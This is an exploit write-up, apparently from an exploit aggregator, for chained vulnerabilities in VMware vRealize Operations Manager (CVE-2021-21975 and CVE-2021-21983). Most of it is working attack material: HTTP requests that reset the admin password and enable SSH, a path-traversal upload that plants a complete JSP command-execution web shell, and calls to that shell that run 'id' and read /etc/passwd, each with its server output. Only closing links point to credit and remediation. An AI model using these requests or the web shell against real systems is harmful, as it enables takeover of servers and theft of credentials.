Exploit for Vulnerability in Vmware Vrealize Operations Manager CVE-2021-21975 CVE-2021-21983

Name: Exploit for Vulnerability in Vmware Vrealize Operations Manager CVE-2021-21975 CVE-2021-21983
Rating: 5 (365 reviews)
2022-03-16 | CVSS 8.5
## https://sploitus.com/exploit?id=33268543-6217-5EB6-9E15-3AD5A03E3B8E
<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager API Arbitrary File Write Leads to Remote Code Execution (RCE)</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
vRealize Operations (vROps) is a tool that self-driving IT operations management powered by AI from apps to infrastructure to optimize, plan and scale VMware Cloud and HCI deployments while unifying public cloud monitoring. VMware vRealize Operations Manager API `8.4 and all previous versions` are vulnerable to Server Side Request Forgery (SSRF) vulnerability. Successfully exploitation of this vulnerability may lead to read or update internal resources and also in this case, an attacker can easily steal administrative credentials of vROps server. With combining [CVE-2021-21975](https://github.com/murataydemir/CVE-2021-21975) and `CVE-2021-21983`, an attacker can run arbitrary code on remote vRealize Operations server.

<b>Attack Chain 1, Step 1:</b> After obtain the valid Authorization token (for more information about how to obtain Authorization token, please visit [CVE-2021-21975](https://github.com/murataydemir/CVE-2021-21975), in order to exploit `CVE-2021-21983` vulnerability, you can use the password reset functionality of API method
```
PUT /casa/os/slice/user HTTP/1.1
Host: vulnerablehost
Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpTZzVzUW1ZODJLb0NZZ1dFdi9Ia0JMeGE=
Content-Type: application/json
Connection: close
Content-Length: 47

{"username":"admin","password":"P@ssw0rd!"}
```
Response of the above request is down below
```
HTTP/1.1 200 200
Date: Mon, 14 Mar 2022 10:14:04 GMT
Server: Apache
X-VSCM-Request-Id: 2q0012uV
Set-Cookie: JSESSIONID=3EF7C5C58CB8056BF7799B6C7A713AAA; Path=/casa; Secure; HttpOnly
Content-Length: 0
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval'; child-src *
Connection: close
```
![image](https://user-images.githubusercontent.com/16391655/158593867-468f0397-c3f1-4035-8b37-04054fe0ee8d.png)

<b>Attack Chain 1, Step 2:</b> Then, we simply enable ssh service on vROps appliance as follow:
```
POST /casa/ssh/enable HTTP/1.1
Host: vulnerablehost
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 68
Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpTZzVzUW1ZODJLb0NZZ1dFdi9Ia0JMeGE

{"is_ssh_enabled":true,"is_ssh_disabled":false,"ssh_status":false}
```
Response of the above request is down below
```
HTTP/1.1 200 200
Date: Fri, 25 Feb 2022 15:23:01 GMT
Server: Apache
X-VSCM-Request-Id: 2q000TKm
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval'; child-src *
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 66

{"is_ssh_enabled":true,"is_ssh_disabled":false,"ssh_status":false}
```
![5 1 - Enable SSH using API Method](https://user-images.githubusercontent.com/16391655/158594113-b810394e-490c-4178-b0b5-3f9ba1037cec.png)

After activating SSH service on the target, we can simply establish connection with the remote vROps instance, like that
```zsh
root@kali[ ~ ] # ssh admin@vulnerablehost
vRealize Operations Manager Appliance
admin@vulnerablehost's password:
Last Login: Fri Feb 25 15:19:31 2022 from Your_IP_Address
admin@vRealizeClusterNode [ ~ ] $ id
uid=1000(admin) gid=1003(admin) groups=1003(admin),0(root),25(apache),28(wheel)
admin@vRealizeClusterNode [ ~ ] $
```
<b>Attack Chain 2, Step 1:</b> Exploiting File Path Traversal and upload lightweight web shell
```
POST /casa/private/config/slice/ha/certificate HTTP/1.1
Host: vulnerablehost
Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpTZzVzUW1ZODJLb0NZZ1dFdi9Ia0JMeGE=
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysCyD1z0cA1bkcfxK
Content-Length: 914

------WebKitFormBoundarysCyD1z0cA1bkcfxK
Content-Disposition: form-data; name="name"

../../../../../usr/lib/vmware-casa/casa-webapp/webapps/casa/webs3ll.jsp
------WebKitFormBoundarysCyD1z0cA1bkcfxK
Content-Disposition: form-data; name="file"; filename="egal"
Content-Type: text/html

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
------WebKitFormBoundarysCyD1z0cA1bkcfxK--
```
Response of the above request is down below
```
HTTP/1.1 200 200
Date: Mon, 14 Mar 2022 10:57:05 GMT
Server: Apache
X-VSCM-Request-Id: 2q0012yJ
Set-Cookie: JSESSIONID=98FB01BB058DCB392FCF76F6FD9039DC; Path=/casa; Secure; HttpOnly
Content-Length: 0
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval'; child-src *
Connection: close
```
![image](https://user-images.githubusercontent.com/16391655/158594214-c2602022-ee44-499c-9731-fa0d3f7d6a7d.png)
![image](https://user-images.githubusercontent.com/16391655/158594313-21e7cd6f-cef6-49a6-979c-4fa796b8631d.png)

<b>Attack Chain 2, Step 2:</b> Make a request to call uploaded web shell
```
GET /casa/webs3ll.jsp?cmd=id HTTP/1.1
Host: vulnerablehost
Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpTZzVzUW1ZODJLb0NZZ1dFdi9Ia0JMeGE=
Connection: close
```
Response of the above request is down below
```
HTTP/1.1 200 200
Date: Wed, 16 Mar 2022 12:45:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=816B1BFE4721A9407C4AAD8E822B83C6; Path=/casa; Secure; HttpOnly
Content-Length: 98
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval'; child-src *
Connection: close
Content-Type: text/html;charset=ISO-8859-1

Command: id<BR>
uid=1000(admin) gid=1003(admin) groups=1003(admin),0(root),25(apache),28(wheel)
```
Reading the content of `/etc/passwd` file
```
GET /casa/webs3ll.jsp?cmd=cat%20/etc/passwd HTTP/1.1
Host: vulnerablehost
Authorization: Basic bWFpbnRlbmFuY2VBZG1pbjpTZzVzUW1ZODJLb0NZZ1dFdi9Ia0JMeGE=
Connection: close
```

```
HTTP/1.1 200 200
Date: Mon, 14 Mar 2022 11:05:36 GMT
Server: Apache
Set-Cookie: JSESSIONID=F98859D8C48095AEC2B91A468E74DCC6; Path=/casa; Secure; HttpOnly
Content-Length: 1017
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval'; child-src *
Connection: close
Content-Type: text/html;charset=ISO-8859-1

Command: cat /etc/passwd<BR>
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/dev/null:/bin/false
daemon:x:6:6:Daemon User:/dev/null:/bin/false
messagebus:x:18:18:D-Bus Message Daemon User:/var/run/dbus:/bin/false
systemd-bus-proxy:x:72:72:systemd Bus Proxy:/:/bin/false
systemd-journal-gateway:x:73:73:systemd Journal Gateway:/:/bin/false
systemd-journal-remote:x:74:74:systemd Journal Remote:/:/bin/false
systemd-journal-upload:x:75:75:systemd Journal Upload:/:/bin/false
systemd-network:x:76:76:systemd Network Management:/:/bin/false
systemd-resolve:x:77:77:systemd Resolver:/:/bin/false
systemd-timesync:x:78:78:systemd Time Synchronization:/:/bin/false
nobody:x:65534:65533:Unprivileged User:/dev/null:/bin/false
sshd:x:50:50:sshd PrivSep:/var/lib/sshd:/bin/false
apache:x:25:25:Apache Server:/srv/www:/bin/false
ntp:x:87:87:Network Time Protocol:/var/lib/ntp:/bin/false
named:x:999:999::/var/lib/bind:/bin/false
admin:x:1000:1003::/home/admin:/bin/bash
postgres:x:1001:100::/var/vmware/vpostgres/9.6:/bin/bash
```
![image](https://user-images.githubusercontent.com/16391655/158594495-9a66f511-746e-450a-b324-f925a4b22dba.png)
![image](https://user-images.githubusercontent.com/16391655/158596762-fabc2c89-1445-4b35-9698-27869df4c4a6.png)

Credit and original blogpost can be found [https://swarm.ptsecurity.com/catching-bugs-in-vmware-carbon-black-cloud-workload-appliance-and-vrealize-operations-manager/](https://swarm.ptsecurity.com/catching-bugs-in-vmware-carbon-black-cloud-workload-appliance-and-vrealize-operations-manager/)

For more information about remediation of this vulnerability, please visit the [https://www.vmware.com/security/advisories/VMSA-2021-0004.html](https://www.vmware.com/security/advisories/VMSA-2021-0004.html)